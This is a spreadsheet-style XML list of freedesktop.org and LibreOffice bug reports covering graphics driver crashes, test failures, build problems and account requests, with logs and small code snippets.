    <t>Bug 36874 solved the problem for 80% of the label forms (the most frequently used labels).
In the case of other 20% (mostly non-symmetrical label forms and label forms with one row or one column) the paper size cannot be calculated from the current label definition.
Therefore the label definition will be enhanced with paper size.
Also the UI of the Label Document wizard can be improved.</t>
  </si>
  <si>
    <t>LIBREOFFICE-52000</t>
  </si>
  <si>
    <t>UI: Unify info links to localized LibO websites</t>
  </si>
  <si>
    <t>I found that with Server Installation of  LibreOffice 3.6.0.0.beta3  German UI/Locale [Build-ID: 3e2b862] on German WIN7 Home Premium (64bit):
Website link in Help/About directly links to  but click to the i in the LibO Start Center leads to . May be you will have to disconnect from Internet to see the difference because there is a forward on the Website.
This problem might be limited to WIN when I tested LibO 3.5.3 under Ubuntu12 with disconnected web I saw some try to connect to de.libreoffice.org
Also found the problem for  not tested systematically for other languages.
This bug has some relation to Bug 51279 - UI: Help/About Website button link should lead to localized LibO Website. Different to situation in Help About -&gt; Website the link behind the Start Center i has been localized from the beginning. May be we can get a common fix for Bug 51279 by fixing this one?
@AndrÃ¡s:
IMHO those links should use a common source so that I think that's your part and not for the translation / localization teams?</t>
  </si>
  <si>
    <t>LIBREOFFICE-77121</t>
  </si>
  <si>
    <t>Header / Footer positions not preserved after RT</t>
  </si>
  <si>
    <t>Created attachment 97022
docx file contain text left pane header and footer
Problem description: 
Header / Footer positions not preserved after RT. After RT header and footer positions are moved up or down.
Steps to reproduce:
1. Open the file in LO
2. Save the file as docx
3. Open the file in MS Office
Current behavior:
Header / Footer positions not preserved after RT.
Expected behavior:
The round-tripped file should be visually same as that of the original i.e all the information should be preserved.</t>
  </si>
  <si>
    <t>dinesh.patil</t>
  </si>
  <si>
    <t>MESA-99188</t>
  </si>
  <si>
    <t>dEQP-EGL.functional.create_context_ext.robust_gl_30.rgb565_no_depth_no_stencil</t>
  </si>
  <si>
    <t>Test fails on Mesa master@40e9f2f and dEQP master@7363696.</t>
  </si>
  <si>
    <t>MESA-96850</t>
  </si>
  <si>
    <t>Crucible tests fail for 32bit mesa</t>
  </si>
  <si>
    <t>The following tests fail on 32 bit platforms:
func.first
func.desc.dynamic.storage-buffer
func.desc.dynamic.uniform-buffer
Nanley has investigated this and is working on Mesa and Crucible fixes.  This bug tracks that work.</t>
  </si>
  <si>
    <t>XORG-8069</t>
  </si>
  <si>
    <t>memleak in libXcursor.so.1.0.2 reversed free logic in _XcursorFileHeaderDestroy</t>
  </si>
  <si>
    <t>i.e
 static void
 _XcursorFileHeaderDestroy (XcursorFileHeader *fileHeader)
 {
     if (!fileHeader)
         free (fileHeader)
 }
patch attached to fix</t>
  </si>
  <si>
    <t>XORG-17533</t>
  </si>
  <si>
    <t>[G43] startx crash when using DVI port</t>
  </si>
  <si>
    <t>Created attachment 18825
lspci -vv
I have a Gigabyte EG43M-S2H which uses a G43 chipset and X4500 video.  The board has VGA DVI hdm and HDMI.  If I use the VGA port everything is fine.  But if I try to use the DVI port the X server crashes while staring up with a segfault and a backtrace.
I'm running a fully updated 64 bit Ubuntu 8.10 alpha 5 with the 2.4.1 driver. (Xorg 7.4 prerelease) I have also tried with 2.4.2 compiled from upstream with the same results.</t>
  </si>
  <si>
    <t>sbergman27</t>
  </si>
  <si>
    <t>CAIRO-48221</t>
  </si>
  <si>
    <t>gl backend</t>
  </si>
  <si>
    <t>Wayland gtk clients broken by 38a242a: spansimagegl: Add fast-path for simple copies</t>
  </si>
  <si>
    <t>When using gtk-based programs on wayland cairo commit 38a242a spansimagegl: Add fast-path for simple copies makes them corrupted. Specifically I think any partly-repainted regions become transparent and remain so until the window is fully repainted.
gnome-calculator demonstrates the problem quite nicely.</t>
  </si>
  <si>
    <t>aguertin+freedesktop</t>
  </si>
  <si>
    <t>MESA-18914</t>
  </si>
  <si>
    <t>do_blit_bitmap(called by intelBitmap) uses dimensions of display window for rendering on fbos</t>
  </si>
  <si>
    <t>Created attachment 20853
Make do_blit_bitmap fall back to software rendering on fbos
The fbo_firecube demo does not render a single frame for me leading to a lockup of the graphics pipeline. 
This is on a GM965 without DRI2 using EXA acceleration and an opengl compositor. Mesa drm xf86-video-intel is latest git.
Debugging with a single glBitmap call instead of all the glutBitmapCharacter calls i noticed that the rendering wraps around on the fbo surface with clipping happening somewhere in the middle of the surface. Making the bitmap cross the top surface border at some x-positions leads to the pipeline lockup.
Adding some debug output to do_blit_bitmap(intel_pixel_bitmap.c:158) revealed that the x_off y_off are non-zero and the width height used for clipping do not match the size of the fbo. These turn out to be the offsets and sizes of the main fbo_firecube window.
Making do_blit_bitmap fall back to software rendering leads to a working fbo_firecube. 
I did first report this as a comment in bug #16521 but it seems to be about a different problem.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-30123</t>
  </si>
  <si>
    <t>Account Creation Request.</t>
  </si>
  <si>
    <t>For: Robert Relyea
Email: rrelyea@redhat.com
Prefered account name: relyea
SSH key:
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsdQAVJoMrhu+tgMpGvBwlsbYdh2w6Bs82ptaGaHpSMe0
X6s0VDoyMrmA4CN5fNTos8bgjvU3YkKfuGAhQlho2A/bafoOTH8pQS1uRAXb59vGVaYA5mEN7LSZQHPj
Rnvdkk13nFX72vO9bxsKrAhaNlDpBxD32NVoJytI/Z25DxApDK4on0kwelsuMqrCw+mOcUaXwKQCi0ac
wvnZXtGjde5UOAvGRFc8k09XHzSbjqYI4FqwlBj9qykDsgu3LBgy2puhOvzau/gGfmRsn6Uma93NRFlA
TLMFGacBLROpnKPjW43iPRiy/Kta5RXJJjDY4PWx/pP60wlEhdksVsE7xw== rrelyea@bobs-laptop
GPG key:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2.0.14 (GNU/Linux)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=DWTf
-----END PGP PUBLIC KEY BLOCK-----</t>
  </si>
  <si>
    <t>rrelyea</t>
  </si>
  <si>
    <t>HARFBUZZ-31174</t>
  </si>
  <si>
    <t>Patch to modernize the autotools configuration a bit to use the new libtool syntax and autoreconf.</t>
  </si>
  <si>
    <t>MESA-72325</t>
  </si>
  <si>
    <t>[swrast] piglit glean fbo regression</t>
  </si>
  <si>
    <t>mesa: 314ccf69016d0025ce251155553cc448159a3b10 (master)
$ ./bin/glean -t fbo --quick
GL_EXT_framebuffer_object is supported
GL_ARB_framebuffer_object is supported
  depth = 0 stencil = 0
  (0 28) = [0.000000 0.000000 0.000000] is expected to be[1.000000 0.000000 0.000000]
FAILURE: Render to single texture failed (at tfbo.cpp:849)
  mode = 0
  depth = 0 stencil = 0
  (0 28) = [0.000000 0.000000 0.000000] is expected to be[1.000000 0.000000 0.000000]
FAILURE: Render to multi texture failed (at tfbo.cpp:1051)
  depth = 1 stencil = 0
  (0 28) = [0.000000 0.000000 0.000000] is expected to be[1.000000 1.000000 1.000000]
FAILURE: Render to depth texture failed (at tfbo.cpp:1154)
fbo:  FAIL rgba8 db z24 s8 win+pmap id 33
	3 tests passed 3 tests failed.
a43b49dfb13dc7e6d2d6d7ceee892077038d7102 is the first bad commit
commit a43b49dfb13dc7e6d2d6d7ceee892077038d7102
Author: Dave Airlie 
Date:   Wed Nov 13 12:53:52 2013 +1000
    mesa/swrast: fix inverted front buffer rendering with old-school swrast
    I've no idea when this broke but we have some people who wanted it fixed
    so here's my attempt.
    reproducer run readpix with swrast hit f or run trival tri -sb things are
    upside down after this patch they aren't.
    Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=62142
    Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=66213
    Cc: 
    Signed-off-by: Dave Airlie 
:040000 040000 70e437e84fa67556a6469a8bf75277a6ec07e8a6 a307a4bc1dcb80aae42897ce27b7771dd8760f4f M	src
bisect run success</t>
  </si>
  <si>
    <t>DBUS-39987</t>
  </si>
  <si>
    <t>dbus-1.4.12 fails to compile on solaris</t>
  </si>
  <si>
    <t>Created attachment 50103
dbus-1.4.12-dbus-sysdeps-util-unix.c.patch
In the file dbus/sysdeps-util-unix.c LOG_PERROR is used which is not define on solaris 10
A workaround is in the attached patch</t>
  </si>
  <si>
    <t>daniel.vergien</t>
  </si>
  <si>
    <t>MESA-77589</t>
  </si>
  <si>
    <t>[r600g] Source engine game stopped working (bisected)</t>
  </si>
  <si>
    <t>Created attachment 97529
Gnome proposing to quit the app
All my Source engine games (Team Fortress 2 Left 4 Dead 2 Half-LifeÂ² Counter-Strike: Source) doesn't work anymore since commit:
commit: 70cf6639c331342619e65c46db925d115bf51920
gallium/radeon: create and return a fence in the flush function
author: Marek OlÅ¡Ã¡k 
date: 2014-04-16 12:02:51 (GMT)
Reviewed-by: Christian KÃ¶nig 
Since this commit when I launch one of this game the screen stays black or it will not launch at all. Finally I got a message from Gnome proposing to wait or quit the app (cf. screenshot).
Config:
kernel 3.13.9-100.fc19.x86_64
libdrm 2.4.53-1.fc20
AMD Evergreen (Radeon HD 5850)
OpenGL renderer string: Gallium 0.4 on AMD CYPRESS
Build config:
autogen.sh --with-gallium-drivers=r600 --with-dri-drivers= --enable-texture-float --disable-dri3 --disable-r600-llvm-compiler --disable-gallium-llvm --enable-32-bit CFLAGS=-O2 -m32 CXXFLAGS=-O2 -m32 --libdir=/usr/lib</t>
  </si>
  <si>
    <t>b.bellec</t>
  </si>
  <si>
    <t>POPPLER-28589</t>
  </si>
  <si>
    <t>PDF files with no password ask for one anyway</t>
  </si>
  <si>
    <t>this report has been filed here:
https://bugs.edge.launchpad.net/ubuntu/+source/poppler/+bug/562588
everytime you open the pdf linked in the report you're asked for a password although there's no password on the pdf file it works fine on acroread.
pdf is here:
http://launchpadlibrarian.net/44082951/Dickey%20CAS.pdf</t>
  </si>
  <si>
    <t>DRI-105924</t>
  </si>
  <si>
    <t>[CI] igt@gem_eio - fail - Failed assertion: __gem_context_create(fd &amp;ctx_id) == 0</t>
  </si>
  <si>
    <t>This started on drmtip_12:
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_12/fi-ilk-650/igt@gem_eio@unwedge-stress.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_12/fi-ilk-m540/igt@gem_eio@unwedge-stress.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_12/fi-ilk-650/igt@gem_eio@reset-stress.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_12/fi-ilk-m540/igt@gem_eio@reset-stress.html
(gem_eio:2476) i915/gem_context-CRITICAL: Test assertion failure function gem_context_create file ../lib/i915/gem_context.c:106:
(gem_eio:2476) i915/gem_context-CRITICAL: Failed assertion: __gem_context_create(fd &amp;ctx_id) == 0
(gem_eio:2476) i915/gem_context-CRITICAL: error: -19 != 0
Subtest unwedge-stress failed.
Note bug 105922 also affect gem_eio tests and started on the same run so a dup maybe?</t>
  </si>
  <si>
    <t>XORG-17138</t>
  </si>
  <si>
    <t>Randr12 on nv34m causes colour corruption on laptop panel.</t>
  </si>
  <si>
    <t>Created attachment 18284
vbtracetool vBIOS dump
Starting X with git nouveau and Randr12 disabled works perfectly.
Enabling Randr12 gives a somewhat corrupted screen which is predominantly red.
My system is a Dell Inspiron 5150 with a 1600x1200 screen and an nv34m.
The corruption is only on the internal panel. Any external screen on the VGA output seems to be fine.
Bug #14403 seemed to be the closest to my experience and so I messed around with nv_bios.c.
In the function parse_lvds_manufacturer_table_init the section labeled:
   /* adjust some things if straps are invalid (implies the panel has EDID) */
resets the lvdsmanufacturerindex from 3 to 0.
Putting in a line to set this back to 3 (or indeed 1 or 2) makes everything seem to work fine.
I did a BIOS dump with vbtracetool. Does this help?</t>
  </si>
  <si>
    <t>murray</t>
  </si>
  <si>
    <t>DRI-91569</t>
  </si>
  <si>
    <t>[BDW-U SKL] System crashing with gem_mmap_gtt over huge-bo-tiledx huge-bo-tiledy and huge-copy-xy</t>
  </si>
  <si>
    <t>Created attachment 117548
tiledx_log
Test Environment:
````````````````````````````````````
Kernel 4.2from Christophe 4.2.0-rc4-drm-intel-testing-ww32+
Mesa: mesa-10.6.3 from http://cgit.freedesktop.org/mesa/mesa/
Xf86_video_intel: 2.99.917 from
http://cgit.freedesktop.org/xorg/driver/xf86-video-intel/
Libdrm: libdrm-2.4.62 from http://cgit.freedesktop.org/mesa/drm/
Cairo: 1.14.2 from http://cgit.freedesktop.org/cairo
libva: libva-1.6.0 from http://cgit.freedesktop.org/libva/
intel-driver: 1.6.0. from http://cgit.freedesktop.org/vaapi/intel-driver
xorg: 1.17.99 installed with script git_xorg.sh
Xserver: xorg-server-1.17.2 from http://cgit.freedesktop.org/xorg/xserver
Intel-gpu-tools: 1.11 from http://cgit.freedesktop.org/xorg/app/intel-gpu-tools/
1. Launch igt with command (as root):
${IGT_DIRNAME}/scripts/run-tests.sh -t gem_mmap_gtt@huge-bo-tiledx or
gem_mmap_gtt@huge-bo-tiledy or gem_mmap_gtt@huge-copy-xy
2. The test start
Actual result:
---------------
2. The test crashes after about 4 seconds sending the following message:gem_mmap_gtt: executing
[  214.755154] gem_mmap_gtt: starting subtest huge-bo-tiledY
[  214.839788] gem_mmap_gtt (3225): drop_caches: 3
[  218.192209] BUG: unable to handle kernel paging request at ffffc90003800000
[  218.192258] 
Expected result:
----------------
2. The test is successful (eventually set to fail/timeout)</t>
  </si>
  <si>
    <t>LIBREOFFICE-64400</t>
  </si>
  <si>
    <t>DXF import mangles Text</t>
  </si>
  <si>
    <t>Steps to re-produce the error:
1. Open a new Writer document.
2. Insert the attached example dxf file as a picture.
3. Not that the texts on the picture looks good.
4. Export the document to pdf.
5. Open the pdf document and conclude that the texts in the documents look. The  
   texts are too long. It looks like the texts continue beyond the end of the 
   original string.
It has been working before. I am using 3.5 for which I do not encounter the problem.
Tomas</t>
  </si>
  <si>
    <t>utkhammar</t>
  </si>
  <si>
    <t>LIBREOFFICE-65561</t>
  </si>
  <si>
    <t>Horizontal scrollbar of the sheet work in LTR instead of RTL</t>
  </si>
  <si>
    <t>Created attachment 80550
Before scrolling
In case I've specified any sheet to work in Right To Left layout the horizontal scrollbar work in Left To Right</t>
  </si>
  <si>
    <t>a.alharthi</t>
  </si>
  <si>
    <t>mbnoimi</t>
  </si>
  <si>
    <t>XORG-66752</t>
  </si>
  <si>
    <t>GCC version check in sna/compiler.h is incorrect</t>
  </si>
  <si>
    <t>The following is causing compile errors for me because gcc 4.5 does not have the -Ofast option
#if HAS_GCC(4 5) &amp;&amp; defined(__OPTIMIZE__)
#define fast_memcpy __attribute__((optimize(Ofast))) __attribute__((target(inline-all-stringops)))
#else
#define fast_memcpy
#endif
It could be corrected if this is done instead
#if HAS_GCC(4 6) &amp;&amp; defined(__OPTIMIZE__)
#define fast_memcpy __attribute__((optimize(Ofast))) __attribute__((target(inline-all-stringops)))
#if HAS_GCC(4 5) &amp;&amp; defined(__OPTIMIZE__)
#define fast_memcpy __attribute__((target(inline-all-stringops)))
#else
#define fast_memcpy
#endif</t>
  </si>
  <si>
    <t>thomas.jones</t>
  </si>
  <si>
    <t>MESA-44561</t>
  </si>
  <si>
    <t>Piglit: spec/glsl-1.10/execution/interpolation/interpolation-none-gl_*-vertex fail</t>
  </si>
  <si>
    <t xml:space="preserve">A regression for all spec/glsl-1.10/execution/interpolation/interpolation-none-gl_*-vertex tests was introduced between master/39464489 and master/78402613. I didn't have time to bisect this yet but maybe you know already which commit might be the culprit.
Used stack:
libdrm: 2.4.30-1
Mesa: master/78402613
Linux: 3.2
DDX: 6.14.3 + commits from Git up until and including master/ae45d7e6
X.org: 1.11.2.902 (1.11.3 RC 2)
Hardware: 1002:9553
Detailed test results available from </t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-1471</t>
  </si>
  <si>
    <t>.FLI animation file recognized as tex font file</t>
  </si>
  <si>
    <t>File is at:
http://gstreamer.freedesktop.org/media/small/pmotion.fli
nautilus says:
application/x-font-tex-tfm
file says:
 FLI file - 72 frames width=320 pixels height=200 pixels depth=8 ticks/frame=3
file is right in this case.
Can I do something else to help debug ?</t>
  </si>
  <si>
    <t>PKG-CONFIG-97453</t>
  </si>
  <si>
    <t>ENABLE_DEFINE_PREFIX defined and empty prefix yields incorrect results</t>
  </si>
  <si>
    <t>The msys2/mingw provided pkg-config is compiled with ENABLE_DEFINE_PREFIX defined.
gstreamer has this pc file:
# the standard variables don't make sense for an uninstalled copy
prefix=
exec_prefix=
libdir=/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/gst/.libs
# includedir is builddir because it is used to find gstconfig.h in places
includedir=/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32
toolsdir=/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/tools
pluginsdir=/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32
girdir=/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/gst
completionsdir=/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/data/completions
helpersdir=/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/libs/gst/helpers
typelibdir=/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/gst
Name: GStreamer Uninstalled
Description: Streaming media framework Not Installed
Version: 1.8.2
Requires: glib-2.0 gobject-2.0
Requires.private: gmodule-no-export-2.0
Libs: -L${libdir} -lgstreamer-1.0
Cflags: -I/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/../gstreamer-1.8.2 -I/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/../gstreamer-1.8.2/libs -I/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32 -I/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/libs
Running pkgconf on it yields this:
$  pkg-config --libs gstreamer-1.0-uninstalled
-LD:/msys64/mingw64/lib -LD:/M/mingw-w64-gstreamer/src/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/gst/.libs -lgstreamer-1.0 -lgobject-2.0 -lglib-2.0 -lintl
You can see that the second -L dir is messed up.
Same with --debug gives this (only significant output is kept):
Reading 'gstreamer-1.0-uninstalled' from file 'D:/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/pkgconfig\gstreamer-1.0-uninstalled.pc'
Parsing package file 'D:/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/pkgconfig\gstreamer-1.0-uninstalled.pc'
  line&gt;
  line&gt;prefix=
 Variable declaration 'prefix' overridden with 'D:/M/mingw-w64-gstreamer/src'
  line&gt;exec_prefix=
 Variable declaration 'exec_prefix' has value ''
  line&gt;libdir=/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/gst/.libs
 Variable declaration 'libdir' has value 'D:/M/mingw-w64-gstreamer/src/D/M/mingw-w64-gstreamer/src/build-x86_64-w64-mingw32/gst/.libs'
  line&gt;
Further research shows that this is caused by pkg-config being compiled with ENABLE_DEFINE_PREFIX enabled.
This will make pkg-config guess the prefix value.
And if the the libdir starts with the original prefix (empty in my case) it will prepend the libdir with the guessed prefix. Net result is wacky and gstreamer fails to compile.</t>
  </si>
  <si>
    <t>philippe_renon</t>
  </si>
  <si>
    <t>BUSTLE-50877</t>
  </si>
  <si>
    <t>No sources for data/bustle.png</t>
  </si>
  <si>
    <t>Using my detective skills I have deduced that the Bustle icon data/bustle.png has been generated with a small Cairo script. I can't find any script in the source tree to generate said icon.
This is a license violation. Please include either the script or remove the icon.
Please let me know if I'm looking in the wrong place. I've been looking at this repository: http://cgit.freedesktop.org/bustle/tree/</t>
  </si>
  <si>
    <t>DRI-100123</t>
  </si>
  <si>
    <t>[KBL][BAT] igt@kms_pipe_crc_basic@suspend-read-crc-pipe-a/b fails on CI</t>
  </si>
  <si>
    <t>On KBL-7500U 
igt@kms_pipe_crc_basic@suspend-read-crc-pipe-a/b fails on CI
https://intel-gfx-ci.01.org/CI/CI_DRM_2306/fi-kbl-7500u/igt@kms_pipe_crc_basic@suspend-read-crc-pipe-a.html
https://intel-gfx-ci.01.org/CI/CI_DRM_2306/fi-kbl-7500u/igt@kms_pipe_crc_basic@suspend-read-crc-pipe-b.html
Out	
rtcwake: wakeup from mem using /dev/rtc0 at Wed Mar  8 16:13:21 2017
IGT-Version: 1.17-g2a7bd7a (x86_64) (Linux: 4.11.0-rc1-CI-CI_DRM_2306+ x86_64)
Stack trace:
  #0 [__igt_fail_assert+0x101]
  #1 [igt_system_suspend_autoresume+0x5a5]
  #2 [__real_main202+0x3ab]
  #3 [main+0x33]
  #4 [__libc_start_main+0xf0]
  #5 [_start+0x29]
  #6 [+0x29]
Subtest suspend-read-crc-pipe-A: FAIL (20.071s)
Err	
rtcwake: write error
(kms_pipe_crc_basic:8348) igt-aux-CRITICAL: Test assertion failure function suspend_via_rtcwake file igt_aux.c:713:
(kms_pipe_crc_basic:8348) igt-aux-CRITICAL: Failed assertion: system(cmd) == 0
(kms_pipe_crc_basic:8348) igt-aux-CRITICAL: This failure means that something is wrong with the rtcwake tool or how your distro is set up. This is not a i915.ko or i-g-t bug.
Subtest suspend-read-crc-pipe-A failed.
**** DEBUG ****
(kms_pipe_crc_basic:8348) DEBUG: Test requirement passed: !(i &gt;= data.display.n_pipes)
(kms_pipe_crc_basic:8348) igt-core-DEBUG: Test requirement passed: !igt_run_in_simulation()
(kms_pipe_crc_basic:8348) igt-aux-DEBUG: Test requirement passed: (power_dir = open(/sys/power O_RDONLY)) &gt;= 0
(kms_pipe_crc_basic:8348) igt-aux-DEBUG: Test requirement passed: get_supported_suspend_states(power_dir) &amp; (1 &lt;&lt; state)
(kms_pipe_crc_basic:8348) igt-aux-DEBUG: Test requirement passed: test == SUSPEND_TEST_NONE || faccessat(power_dir pm_test R_OK | W_OK 0) == 0
(kms_pipe_crc_basic:8348) igt-aux-DEBUG: Test requirement passed: system(cmd) == 0
(kms_pipe_crc_basic:8348) igt-aux-CRITICAL: Test assertion failure function suspend_via_rtcwake file igt_aux.c:713:
(kms_pipe_crc_basic:8348) igt-aux-CRITICAL: Failed assertion: system(cmd) == 0
(kms_pipe_crc_basic:8348) igt-aux-CRITICAL: This failure means that something is wrong with the rtcwake tool or how your distro is set up. This is not a i915.ko or i-g-t bug.
****  END  ****
Environment	
PIGLIT_PLATFORM=mixed_glx_egl PIGLIT_SOURCE_DIR=/opt/igt/piglit
Command	
/opt/igt/tests/kms_pipe_crc_basic --run-subtest suspend-read-crc-pipe-A
Dmesg: https://intel-gfx-ci.01.org/CI/CI_DRM_2306/fi-kbl-7500u/dmesg-during.log</t>
  </si>
  <si>
    <t>TANGO-10222</t>
  </si>
  <si>
    <t>Add icon-naming-utils-uninstalled.pc file to aid Solaris build environment</t>
  </si>
  <si>
    <t>As described in bugzilla 9837 on Solaris we group multiple modules into one package. WRT this bug SUNWgnome-themes includes icon-naming-utils tango-icon-theme and 8 other modules.
During tango-icon-theme's 'make install' step it calls icon-name-mapping. It gets the path to that script via a pkg-config call.
The attached patch adds an uninstalled.pc file to allow for the finding of the script before icon-naming-utils has been installed.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-104752</t>
  </si>
  <si>
    <t>Account Request for Chuck Atkins</t>
  </si>
  <si>
    <t>I have been periodically submitting matches to the mesa-dev list for the past few years and would like an account to the Mesa git repo so I can commit my own patches now rather than relying on others to do so.  I typically make bugfixes and minor feature contributions to the autoconf build and the OpenSWR driver.</t>
  </si>
  <si>
    <t>chuck.atkins</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-8861</t>
  </si>
  <si>
    <t>my GPG key</t>
  </si>
  <si>
    <t>I have not send my GPG key before thus I will send it here.</t>
  </si>
  <si>
    <t>amir.bukhari</t>
  </si>
  <si>
    <t>CAIRO-17411</t>
  </si>
  <si>
    <t>Transparency should be optionally flattened to a new path rather than bitmap</t>
  </si>
  <si>
    <t>Currently PS/EPS surface flattens transparency to a bitmap. This can make a resulted file much larger than it could be. A good solution would be to flatten transparency in overlapping regions to new paths that have opaque fill matching the transparency projection.
More info: http://www.adobe.com/products/creativesuite/pdfs/txpguidecs2.pdf (page 4 and below)</t>
  </si>
  <si>
    <t>alexandre.prokoudine</t>
  </si>
  <si>
    <t>XORG-60547</t>
  </si>
  <si>
    <t>[sna ivb] disabling VGA1 output misrenders windows</t>
  </si>
  <si>
    <t>Created attachment 74488
the bug
I'm not sure whether this is ddx or kde or kernel. When I disabled VGA1 output in the settings window (the window in the background of the picture) windows are no longer redrawn and height of their frames is too big.
A particular window is rendered even after switching windows by alt-tab.
It happens with 2.21.0-3-g9640640.</t>
  </si>
  <si>
    <t>jirislaby</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-99428</t>
  </si>
  <si>
    <t>Request creating a Mailing List for EzBench</t>
  </si>
  <si>
    <t>Hi
EzBench is getting more and more user and I would like to have a mailing list for its development/users.
Name: Ezbench-dev
Title: Graphics stack testing/benchmarking utility
Description: EzBench is a project that automates running/bisecting unit/rendering tests and benchmarking of the graphics stack.
Thanks!</t>
  </si>
  <si>
    <t>LIBREOFFICE-73165</t>
  </si>
  <si>
    <t>inline spellchecking waits for typing pauses before redlining errors</t>
  </si>
  <si>
    <t>Hello
I have been using LibreOffice for years on Linux. I have recently noticed that spellchecking has become terribly slow. I am using Libreoffice 4.1.4.2 on Arch Linux on a fast Intel Core I5 laptop and I've never seen spellchecking this slow. It usually takes at least 1 second after hitting the spacebar after a misspelled word before it shows up with a red underline. Sometimes it takes 5 seconds or more. By this time I have usually typed far beyond that word and don't notice it anymore. This slowness occurs with both English and Spanish spellchecking and I imagine the other languages are the same. I can also confirm that on Firefox the built in spellchecking (which I believe uses the same engine?) is instantaneous and reliable. I can't really say when exactly this regression happened but a few months ago I don't think it was this bad on whatever the current LibO version was at that time.
Thanks for looking into this.
Operating System: Linux (Other)
Version: 4.1.4.2 release</t>
  </si>
  <si>
    <t>sb56637</t>
  </si>
  <si>
    <t>XORG-671</t>
  </si>
  <si>
    <t>Display corruption on exit</t>
  </si>
  <si>
    <t>Using the VIA display driver with XOrg 6.7.0 it is impossible to cleanly exit
the X environment. After exiting using any graphical environment (GNOME Window
Maker plain X with an xterm etc) the X server terminates normally but instead
of returning to the normal console the display becomes severely corrupted: a
snowy unreadable display that requires a reboot to fix. The only way I can exit
X is to switch to a console VT while X is running and issue a kill $(pidof X).
This display corruption happens any time the X server dies while in control of
the display (whether it crashes abnormally or exits cleanly).
My chipset is VIA KM400 onboard video on an ASUS A7V8X-MX motherboard. I'm using
a VESA framebuffer console (1024x768x16bpp) with kernel 2.6.5 on a Gentoo system
(non-bootsplash).</t>
  </si>
  <si>
    <t>mutualaid</t>
  </si>
  <si>
    <t>XORG-95031</t>
  </si>
  <si>
    <t>[NVE4] 660 Ti Random GPU lockups</t>
  </si>
  <si>
    <t>Created attachment 123085
nouveau bugs
Having random lockups on a GTX 660 Ti (NVE4) since kernel 4.1 I guess using DRI2.
[    0.267666] nouveau 0000:02:00.0: NVIDIA GK104 (0e4030a2)
[    0.378583] nouveau 0000:02:00.0: bios: version 80.04.4b.00.1a
[    0.379302] nouveau 0000:02:00.0: fb: 2048 MiB GDDR5
Now on gentoo ~amd64 using:
sys-kernel/gentoo-sources-4.5.1
x11-base/xorg-server-1.18.3
x11-drivers/xf86-video-nouveau-1.0.12
Also tried Karol Herbst reclocking branch v4 (https://github.com/karolherbst/nouveau/tree/stable_reclocking_kepler_v4) reclocked to pstate 07 and tried all 3 boost states. All hang sooner or later.
Will continue testing other pstates and boost configurations.
Sometimes the kernel log becomes corrupted but I managed to get a working log (attached).</t>
  </si>
  <si>
    <t>lucasout</t>
  </si>
  <si>
    <t>MESA-32564</t>
  </si>
  <si>
    <t>[llvmpipe] prog: Unknown command line argument '-disable-mmx'.  Try: 'prog -help' with llvm-2.9svn</t>
  </si>
  <si>
    <t>mesa: 4fe78d3e12fa963273de4d83b1fd55a78a5d41bf (master)
llvm: llvm-2.9svn r122379
Run any program with llvmpipe built with llvm-2.9svn. The following error appears.
prog: Unknown command line argument '-disable-mmx'.  Try: 'prog -help'
The error occurs with both 32-bit and 64-bit llvm.
The error does not occur with llvm-2.9svn r121711.
llvm-2.6 - good
llvm-2.7 - good
llvm-2.8 - good
llvm-2.9svn r121711 - good
llvm-2.9svn r122379 - bad</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-56497</t>
  </si>
  <si>
    <t>New Account for Felix Rohrbach</t>
  </si>
  <si>
    <t>Created attachment 69193
ssh key
As an OCS developer I'd like to have an account for freedesktop.org. My preferred user name would be fxrh. My email address is fxrh@gmx.de</t>
  </si>
  <si>
    <t>fxrh</t>
  </si>
  <si>
    <t>MESA-109442</t>
  </si>
  <si>
    <t>make check test anv_block_pool_no_free fails intermittently</t>
  </si>
  <si>
    <t>When the test fails it fails with:
block_pool_no_free: src/intel/vulkan/tests/block_pool_no_free.c:65: alloc_blocks: Assertion `*data == block' failed.
Sometimes I have to run it 5 or 8 times in a row to get it to fail.
I ran in valgrind (with --trace-children=yes) and it only produced a bunch of warnings about invalid file descriptor -1 in syscall close().  I don't think that's related.</t>
  </si>
  <si>
    <t>XORG-40306</t>
  </si>
  <si>
    <t>Server/Ext/DRI</t>
  </si>
  <si>
    <t>Add driver-independent API to detect dedicated VRAM size</t>
  </si>
  <si>
    <t>Currently Xorg (because of OpenGL API limitations) doesn't support easy enough way to detect dedicated VRAM size by OpenGL applications. This makes it hard to detect what resources are available for usage without too big performance penalty.
Here're some links where this problem is discussed:
http://www.opengl.org/discussion_boards/ubbthreads.php?ubb=showflat&amp;Number=251672
This one states that Windows and MacOSX do have some mechanisms for this while Linux and other OSes using Xorg don't.
http://wiki.jswindle.com/index.php/Wine_Registry#Video_Memory_Size
This one states that WINE has to guess video memory size (and in reality the result is often incorrect).
